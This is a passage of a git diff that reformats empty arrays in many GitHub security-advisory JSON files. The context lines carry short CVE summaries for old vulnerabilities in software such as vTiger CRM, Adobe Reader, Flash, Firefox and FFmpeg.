b/advisories/unreviewed/2022/05/GHSA-hm85-49m2-5vc3/GHSA-hm85-49m2-5vc3.json index ba07b3b78e4..73afdd813cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-hm85-49m2-5vc3/GHSA-hm85-49m2-5vc3.json +++ b/advisories/unreviewed/2022/05/GHSA-hm85-49m2-5vc3/GHSA-hm85-49m2-5vc3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hmm9-g82m-cgvw/GHSA-hmm9-g82m-cgvw.json b/advisories/unreviewed/2022/05/GHSA-hmm9-g82m-cgvw/GHSA-hmm9-g82m-cgvw.json index 947bbfff12c..6e1dffbdcc0 100644 --- a/advisories/unreviewed/2022/05/GHSA-hmm9-g82m-cgvw/GHSA-hmm9-g82m-cgvw.json +++ b/advisories/unreviewed/2022/05/GHSA-hmm9-g82m-cgvw/GHSA-hmm9-g82m-cgvw.json @@ -7,12 +7,8 @@ "CVE-2013-5091" ], "details": "SQL injection vulnerability in CalendarCommon.php in vTiger CRM 5.4.0 and possibly earlier allows remote authenticated users to execute arbitrary SQL commands via the onlyforuser parameter in an index action to index.php. NOTE: this issue might be a duplicate of CVE-2011-4559.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hmmq-hjh9-ghq8/GHSA-hmmq-hjh9-ghq8.json b/advisories/unreviewed/2022/05/GHSA-hmmq-hjh9-ghq8/GHSA-hmmq-hjh9-ghq8.json index ef66de8833b..96587bbc136 100644 --- a/advisories/unreviewed/2022/05/GHSA-hmmq-hjh9-ghq8/GHSA-hmmq-hjh9-ghq8.json +++ b/advisories/unreviewed/2022/05/GHSA-hmmq-hjh9-ghq8/GHSA-hmmq-hjh9-ghq8.json @@ -7,12 +7,8 @@ "CVE-2011-0396" ], "details": "Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 8.0 before 8.0(5.23), 8.1 before 8.1(2.49), 8.2 before 8.2(4.1), and 8.3 before 8.3(2.13), when a Certificate Authority (CA) is configured, allow remote attackers to read arbitrary files via unspecified vectors, aka Bug ID CSCtk12352.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hmpv-pvg5-4fpq/GHSA-hmpv-pvg5-4fpq.json b/advisories/unreviewed/2022/05/GHSA-hmpv-pvg5-4fpq/GHSA-hmpv-pvg5-4fpq.json index a768485e612..26410e18255 100644 --- a/advisories/unreviewed/2022/05/GHSA-hmpv-pvg5-4fpq/GHSA-hmpv-pvg5-4fpq.json +++ b/advisories/unreviewed/2022/05/GHSA-hmpv-pvg5-4fpq/GHSA-hmpv-pvg5-4fpq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hp4r-vvhf-wh2p/GHSA-hp4r-vvhf-wh2p.json b/advisories/unreviewed/2022/05/GHSA-hp4r-vvhf-wh2p/GHSA-hp4r-vvhf-wh2p.json index ce8c80deb61..698da08c9e8 100644 --- a/advisories/unreviewed/2022/05/GHSA-hp4r-vvhf-wh2p/GHSA-hp4r-vvhf-wh2p.json +++ b/advisories/unreviewed/2022/05/GHSA-hp4r-vvhf-wh2p/GHSA-hp4r-vvhf-wh2p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hp6r-93x9-m75r/GHSA-hp6r-93x9-m75r.json b/advisories/unreviewed/2022/05/GHSA-hp6r-93x9-m75r/GHSA-hp6r-93x9-m75r.json index 002ff5cbe19..8f4f46bd077 100644 --- a/advisories/unreviewed/2022/05/GHSA-hp6r-93x9-m75r/GHSA-hp6r-93x9-m75r.json +++ b/advisories/unreviewed/2022/05/GHSA-hp6r-93x9-m75r/GHSA-hp6r-93x9-m75r.json @@ -7,12 +7,8 @@ "CVE-2010-3620" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3629.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hrfh-hw79-vvhm/GHSA-hrfh-hw79-vvhm.json b/advisories/unreviewed/2022/05/GHSA-hrfh-hw79-vvhm/GHSA-hrfh-hw79-vvhm.json index 32255c747d1..8a6efdcdd78 100644 --- a/advisories/unreviewed/2022/05/GHSA-hrfh-hw79-vvhm/GHSA-hrfh-hw79-vvhm.json +++ b/advisories/unreviewed/2022/05/GHSA-hrfh-hw79-vvhm/GHSA-hrfh-hw79-vvhm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hrv2-h7rh-2wq4/GHSA-hrv2-h7rh-2wq4.json b/advisories/unreviewed/2022/05/GHSA-hrv2-h7rh-2wq4/GHSA-hrv2-h7rh-2wq4.json index 2da7e28b98d..bc0b0f0d36e 100644 --- a/advisories/unreviewed/2022/05/GHSA-hrv2-h7rh-2wq4/GHSA-hrv2-h7rh-2wq4.json +++ b/advisories/unreviewed/2022/05/GHSA-hrv2-h7rh-2wq4/GHSA-hrv2-h7rh-2wq4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hv5q-6ffq-rj2h/GHSA-hv5q-6ffq-rj2h.json b/advisories/unreviewed/2022/05/GHSA-hv5q-6ffq-rj2h/GHSA-hv5q-6ffq-rj2h.json index 4a338bb4fd3..dc8b15173b4 100644 --- a/advisories/unreviewed/2022/05/GHSA-hv5q-6ffq-rj2h/GHSA-hv5q-6ffq-rj2h.json +++ b/advisories/unreviewed/2022/05/GHSA-hv5q-6ffq-rj2h/GHSA-hv5q-6ffq-rj2h.json @@ -7,12 +7,8 @@ "CVE-2013-5599" ], "details": "Use-after-free vulnerability in the nsIPresShell::GetPresContext function in the PresShell (aka presentation shell) implementation in Mozilla Firefox before 25.0, Firefox ESR 17.x before 17.0.10 and 24.x before 24.1, Thunderbird before 24.1, Thunderbird ESR 17.x before 17.0.10, and SeaMonkey before 2.22 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption and application crash) via vectors involving a CANVAS element, a mozTextStyle attribute, and an onresize event.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hvj6-jwpx-2cj7/GHSA-hvj6-jwpx-2cj7.json b/advisories/unreviewed/2022/05/GHSA-hvj6-jwpx-2cj7/GHSA-hvj6-jwpx-2cj7.json index b98946b39bf..d431d3fca12 100644 --- a/advisories/unreviewed/2022/05/GHSA-hvj6-jwpx-2cj7/GHSA-hvj6-jwpx-2cj7.json +++ b/advisories/unreviewed/2022/05/GHSA-hvj6-jwpx-2cj7/GHSA-hvj6-jwpx-2cj7.json @@ -7,12 +7,8 @@ "CVE-2010-3630" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hw33-x8j9-76jp/GHSA-hw33-x8j9-76jp.json b/advisories/unreviewed/2022/05/GHSA-hw33-x8j9-76jp/GHSA-hw33-x8j9-76jp.json index e4cfa479cf2..2d6a9e23ced 100644 --- a/advisories/unreviewed/2022/05/GHSA-hw33-x8j9-76jp/GHSA-hw33-x8j9-76jp.json +++ b/advisories/unreviewed/2022/05/GHSA-hw33-x8j9-76jp/GHSA-hw33-x8j9-76jp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hw75-r7mc-2jw8/GHSA-hw75-r7mc-2jw8.json b/advisories/unreviewed/2022/05/GHSA-hw75-r7mc-2jw8/GHSA-hw75-r7mc-2jw8.json index c589d804640..ec5ebaca2ab 100644 --- a/advisories/unreviewed/2022/05/GHSA-hw75-r7mc-2jw8/GHSA-hw75-r7mc-2jw8.json +++ b/advisories/unreviewed/2022/05/GHSA-hw75-r7mc-2jw8/GHSA-hw75-r7mc-2jw8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hwj5-x3jv-hmff/GHSA-hwj5-x3jv-hmff.json b/advisories/unreviewed/2022/05/GHSA-hwj5-x3jv-hmff/GHSA-hwj5-x3jv-hmff.json index cbdf6b4ec0e..9eccb0e8f8d 100644 --- a/advisories/unreviewed/2022/05/GHSA-hwj5-x3jv-hmff/GHSA-hwj5-x3jv-hmff.json +++ b/advisories/unreviewed/2022/05/GHSA-hwj5-x3jv-hmff/GHSA-hwj5-x3jv-hmff.json @@ -7,12 +7,8 @@ "CVE-2015-3153" ], "details": "The default configuration for cURL and libcurl before 7.42.1 sends custom HTTP headers to both the proxy and destination server, which might allow remote proxy servers to obtain sensitive information by reading the header contents.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hwx7-4wmc-24vv/GHSA-hwx7-4wmc-24vv.json b/advisories/unreviewed/2022/05/GHSA-hwx7-4wmc-24vv/GHSA-hwx7-4wmc-24vv.json index 440cbbc664c..7d4433e952b 100644 --- a/advisories/unreviewed/2022/05/GHSA-hwx7-4wmc-24vv/GHSA-hwx7-4wmc-24vv.json +++ b/advisories/unreviewed/2022/05/GHSA-hwx7-4wmc-24vv/GHSA-hwx7-4wmc-24vv.json @@ -7,12 +7,8 @@ "CVE-2010-3910" ], "details": "Multiple directory traversal vulnerabilities in the return_application_language function in include/utils/utils.php in vtiger CRM before 5.2.1 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in (1) the lang_crm parameter to phprint.php or (2) the current_language parameter in an Accounts Import action to graph.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hxm7-hg74-hf87/GHSA-hxm7-hg74-hf87.json b/advisories/unreviewed/2022/05/GHSA-hxm7-hg74-hf87/GHSA-hxm7-hg74-hf87.json index 6b62de068e5..40fb865466f 100644 --- a/advisories/unreviewed/2022/05/GHSA-hxm7-hg74-hf87/GHSA-hxm7-hg74-hf87.json +++ b/advisories/unreviewed/2022/05/GHSA-hxm7-hg74-hf87/GHSA-hxm7-hg74-hf87.json @@ -7,12 +7,8 @@ "CVE-2010-2888" ], "details": "Multiple unspecified vulnerabilities in an ActiveX control in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Windows allow attackers to execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j3hv-8587-44rm/GHSA-j3hv-8587-44rm.json b/advisories/unreviewed/2022/05/GHSA-j3hv-8587-44rm/GHSA-j3hv-8587-44rm.json index d29ae187b98..230c92e4e34 100644 --- a/advisories/unreviewed/2022/05/GHSA-j3hv-8587-44rm/GHSA-j3hv-8587-44rm.json +++ b/advisories/unreviewed/2022/05/GHSA-j3hv-8587-44rm/GHSA-j3hv-8587-44rm.json @@ -7,12 +7,8 @@ "CVE-2008-6065" ], "details": "Oracle Database Server 10.1, 10.2, and 11g grants directory WRITE permissions for arbitrary pathnames that are aliased in a CREATE OR REPLACE DIRECTORY statement, which allows remote authenticated users with CREATE ANY DIRECTORY privileges to gain SYSDBA privileges by aliasing the pathname of the password directory, and then overwriting the password file through UTL_FILE operations, a related issue to CVE-2006-7141.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j4r3-4332-hqrv/GHSA-j4r3-4332-hqrv.json b/advisories/unreviewed/2022/05/GHSA-j4r3-4332-hqrv/GHSA-j4r3-4332-hqrv.json index 94b514a9844..6a55cfb56bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-j4r3-4332-hqrv/GHSA-j4r3-4332-hqrv.json +++ b/advisories/unreviewed/2022/05/GHSA-j4r3-4332-hqrv/GHSA-j4r3-4332-hqrv.json @@ -7,12 +7,8 @@ "CVE-2012-5129" ], "details": "Heap-based buffer overflow in the WebGL subsystem in Google Chrome OS before 23.0.1271.94 allows remote attackers to cause a denial of service (GPU process crash) or possibly have unspecified other impact via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j5f6-6w82-3px6/GHSA-j5f6-6w82-3px6.json b/advisories/unreviewed/2022/05/GHSA-j5f6-6w82-3px6/GHSA-j5f6-6w82-3px6.json index ada3db1350b..fe47fcab672 100644 --- a/advisories/unreviewed/2022/05/GHSA-j5f6-6w82-3px6/GHSA-j5f6-6w82-3px6.json +++ b/advisories/unreviewed/2022/05/GHSA-j5f6-6w82-3px6/GHSA-j5f6-6w82-3px6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j5fp-v7mq-4vvh/GHSA-j5fp-v7mq-4vvh.json b/advisories/unreviewed/2022/05/GHSA-j5fp-v7mq-4vvh/GHSA-j5fp-v7mq-4vvh.json index 62bfa37d710..bc5426712d6 100644 --- a/advisories/unreviewed/2022/05/GHSA-j5fp-v7mq-4vvh/GHSA-j5fp-v7mq-4vvh.json +++ b/advisories/unreviewed/2022/05/GHSA-j5fp-v7mq-4vvh/GHSA-j5fp-v7mq-4vvh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j66j-6mgv-px39/GHSA-j66j-6mgv-px39.json b/advisories/unreviewed/2022/05/GHSA-j66j-6mgv-px39/GHSA-j66j-6mgv-px39.json index 87021016c5f..7fc72ac1553 100644 --- a/advisories/unreviewed/2022/05/GHSA-j66j-6mgv-px39/GHSA-j66j-6mgv-px39.json +++ b/advisories/unreviewed/2022/05/GHSA-j66j-6mgv-px39/GHSA-j66j-6mgv-px39.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j7jv-8w7c-6jr8/GHSA-j7jv-8w7c-6jr8.json b/advisories/unreviewed/2022/05/GHSA-j7jv-8w7c-6jr8/GHSA-j7jv-8w7c-6jr8.json index 14ca06ce671..8597d85448b 100644 --- a/advisories/unreviewed/2022/05/GHSA-j7jv-8w7c-6jr8/GHSA-j7jv-8w7c-6jr8.json +++ b/advisories/unreviewed/2022/05/GHSA-j7jv-8w7c-6jr8/GHSA-j7jv-8w7c-6jr8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j828-53qv-9v8f/GHSA-j828-53qv-9v8f.json b/advisories/unreviewed/2022/05/GHSA-j828-53qv-9v8f/GHSA-j828-53qv-9v8f.json index 82d709e5fd1..b986a161857 100644 --- a/advisories/unreviewed/2022/05/GHSA-j828-53qv-9v8f/GHSA-j828-53qv-9v8f.json +++ b/advisories/unreviewed/2022/05/GHSA-j828-53qv-9v8f/GHSA-j828-53qv-9v8f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j858-6544-mp99/GHSA-j858-6544-mp99.json b/advisories/unreviewed/2022/05/GHSA-j858-6544-mp99/GHSA-j858-6544-mp99.json index 1eb0857d6cf..7a3a34a604b 100644 --- a/advisories/unreviewed/2022/05/GHSA-j858-6544-mp99/GHSA-j858-6544-mp99.json +++ b/advisories/unreviewed/2022/05/GHSA-j858-6544-mp99/GHSA-j858-6544-mp99.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j8g5-fv8j-f45c/GHSA-j8g5-fv8j-f45c.json b/advisories/unreviewed/2022/05/GHSA-j8g5-fv8j-f45c/GHSA-j8g5-fv8j-f45c.json index 9ed20575bdf..8ed22e56804 100644 --- a/advisories/unreviewed/2022/05/GHSA-j8g5-fv8j-f45c/GHSA-j8g5-fv8j-f45c.json +++ b/advisories/unreviewed/2022/05/GHSA-j8g5-fv8j-f45c/GHSA-j8g5-fv8j-f45c.json @@ -7,12 +7,8 @@ "CVE-2008-4822" ], "details": "Adobe Flash Player 9.0.124.0 and earlier does not properly interpret policy files, which allows remote attackers to bypass a non-root domain policy.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -92,9 +88,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j8jx-4gq3-2fmw/GHSA-j8jx-4gq3-2fmw.json b/advisories/unreviewed/2022/05/GHSA-j8jx-4gq3-2fmw/GHSA-j8jx-4gq3-2fmw.json index b9256afb824..84f3f8ef78d 100644 --- a/advisories/unreviewed/2022/05/GHSA-j8jx-4gq3-2fmw/GHSA-j8jx-4gq3-2fmw.json +++ b/advisories/unreviewed/2022/05/GHSA-j8jx-4gq3-2fmw/GHSA-j8jx-4gq3-2fmw.json @@ -7,12 +7,8 @@ "CVE-2010-2160" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via an invalid offset in an unspecified undocumented opcode in ActionScript Virtual Machine 2, related to getouterscope, a different vulnerability than CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j9cq-7374-2854/GHSA-j9cq-7374-2854.json b/advisories/unreviewed/2022/05/GHSA-j9cq-7374-2854/GHSA-j9cq-7374-2854.json index 26b97ab7c22..5b85f3537be 100644 --- a/advisories/unreviewed/2022/05/GHSA-j9cq-7374-2854/GHSA-j9cq-7374-2854.json +++ b/advisories/unreviewed/2022/05/GHSA-j9cq-7374-2854/GHSA-j9cq-7374-2854.json @@ -7,12 +7,8 @@ "CVE-2010-3658" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3632.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jcx6-75pf-3r83/GHSA-jcx6-75pf-3r83.json b/advisories/unreviewed/2022/05/GHSA-jcx6-75pf-3r83/GHSA-jcx6-75pf-3r83.json index 29f5a624cd9..6c50118ec5c 100644 --- a/advisories/unreviewed/2022/05/GHSA-jcx6-75pf-3r83/GHSA-jcx6-75pf-3r83.json +++ b/advisories/unreviewed/2022/05/GHSA-jcx6-75pf-3r83/GHSA-jcx6-75pf-3r83.json @@ -7,12 +7,8 @@ "CVE-2011-2137" ], "details": "Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2414, and CVE-2011-2415.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jf6r-2jh6-5f5q/GHSA-jf6r-2jh6-5f5q.json b/advisories/unreviewed/2022/05/GHSA-jf6r-2jh6-5f5q/GHSA-jf6r-2jh6-5f5q.json index 69d9b67711a..f00b0d3ae9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-jf6r-2jh6-5f5q/GHSA-jf6r-2jh6-5f5q.json +++ b/advisories/unreviewed/2022/05/GHSA-jf6r-2jh6-5f5q/GHSA-jf6r-2jh6-5f5q.json @@ -7,12 +7,8 @@ "CVE-2010-2206" ], "details": "Array index error in AcroForm.api in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted GIF image in a PDF file, which bypasses a size check and triggers a heap-based buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jf8h-wqmh-2m6x/GHSA-jf8h-wqmh-2m6x.json b/advisories/unreviewed/2022/05/GHSA-jf8h-wqmh-2m6x/GHSA-jf8h-wqmh-2m6x.json index 6534d595231..4acd0e4469d 100644 --- a/advisories/unreviewed/2022/05/GHSA-jf8h-wqmh-2m6x/GHSA-jf8h-wqmh-2m6x.json +++ b/advisories/unreviewed/2022/05/GHSA-jf8h-wqmh-2m6x/GHSA-jf8h-wqmh-2m6x.json @@ -7,12 +7,8 @@ "CVE-2010-3549" ], "details": "Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that this is an HTTP request splitting vulnerability involving the handling of the chunked transfer encoding method by the HttpURLConnection class.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -156,9 +152,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jg49-fg57-574h/GHSA-jg49-fg57-574h.json b/advisories/unreviewed/2022/05/GHSA-jg49-fg57-574h/GHSA-jg49-fg57-574h.json index 3459721efc6..b8b1013068d 100644 --- a/advisories/unreviewed/2022/05/GHSA-jg49-fg57-574h/GHSA-jg49-fg57-574h.json +++ b/advisories/unreviewed/2022/05/GHSA-jg49-fg57-574h/GHSA-jg49-fg57-574h.json @@ -7,12 +7,8 @@ "CVE-2012-2776" ], "details": "Unspecified vulnerability in the decode_cell_data function in libavcodec/indeo3.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to an \"out of picture write.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jg85-fhqf-2gfw/GHSA-jg85-fhqf-2gfw.json b/advisories/unreviewed/2022/05/GHSA-jg85-fhqf-2gfw/GHSA-jg85-fhqf-2gfw.json index 8d7643eba06..7c80fbd5b0a 100644 --- a/advisories/unreviewed/2022/05/GHSA-jg85-fhqf-2gfw/GHSA-jg85-fhqf-2gfw.json +++ b/advisories/unreviewed/2022/05/GHSA-jg85-fhqf-2gfw/GHSA-jg85-fhqf-2gfw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jgw5-x48h-mm86/GHSA-jgw5-x48h-mm86.json b/advisories/unreviewed/2022/05/GHSA-jgw5-x48h-mm86/GHSA-jgw5-x48h-mm86.json index dfbbe4bcb28..5b18002dced 100644 --- a/advisories/unreviewed/2022/05/GHSA-jgw5-x48h-mm86/GHSA-jgw5-x48h-mm86.json +++ b/advisories/unreviewed/2022/05/GHSA-jgw5-x48h-mm86/GHSA-jgw5-x48h-mm86.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jgwh-gf9q-8hjj/GHSA-jgwh-gf9q-8hjj.json b/advisories/unreviewed/2022/05/GHSA-jgwh-gf9q-8hjj/GHSA-jgwh-gf9q-8hjj.json index b19b9b027c5..91bf08a713c 100644 --- a/advisories/unreviewed/2022/05/GHSA-jgwh-gf9q-8hjj/GHSA-jgwh-gf9q-8hjj.json +++ b/advisories/unreviewed/2022/05/GHSA-jgwh-gf9q-8hjj/GHSA-jgwh-gf9q-8hjj.json @@ -7,12 +7,8 @@ "CVE-2010-2210" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2211, and CVE-2010-2212.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jj3j-75wc-9j9f/GHSA-jj3j-75wc-9j9f.json b/advisories/unreviewed/2022/05/GHSA-jj3j-75wc-9j9f/GHSA-jj3j-75wc-9j9f.json index 47318a793f6..8380516fc15 100644 --- a/advisories/unreviewed/2022/05/GHSA-jj3j-75wc-9j9f/GHSA-jj3j-75wc-9j9f.json +++ b/advisories/unreviewed/2022/05/GHSA-jj3j-75wc-9j9f/GHSA-jj3j-75wc-9j9f.json @@ -7,12 +7,8 @@ "CVE-2011-3937" ], "details": "The H.263 codec (libavcodec/h263dec.c) in FFmpeg 0.7.x before 0.7.12, 0.8.x before 0.8.11, and unspecified versions before 0.10, and in Libav 0.5.x before 0.5.9, 0.6.x before 0.6.6, 0.7.x before 0.7.5, and 0.8.x before 0.8.1 has unspecified impact and attack vectors related to \"width/height changing with frame threads.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": 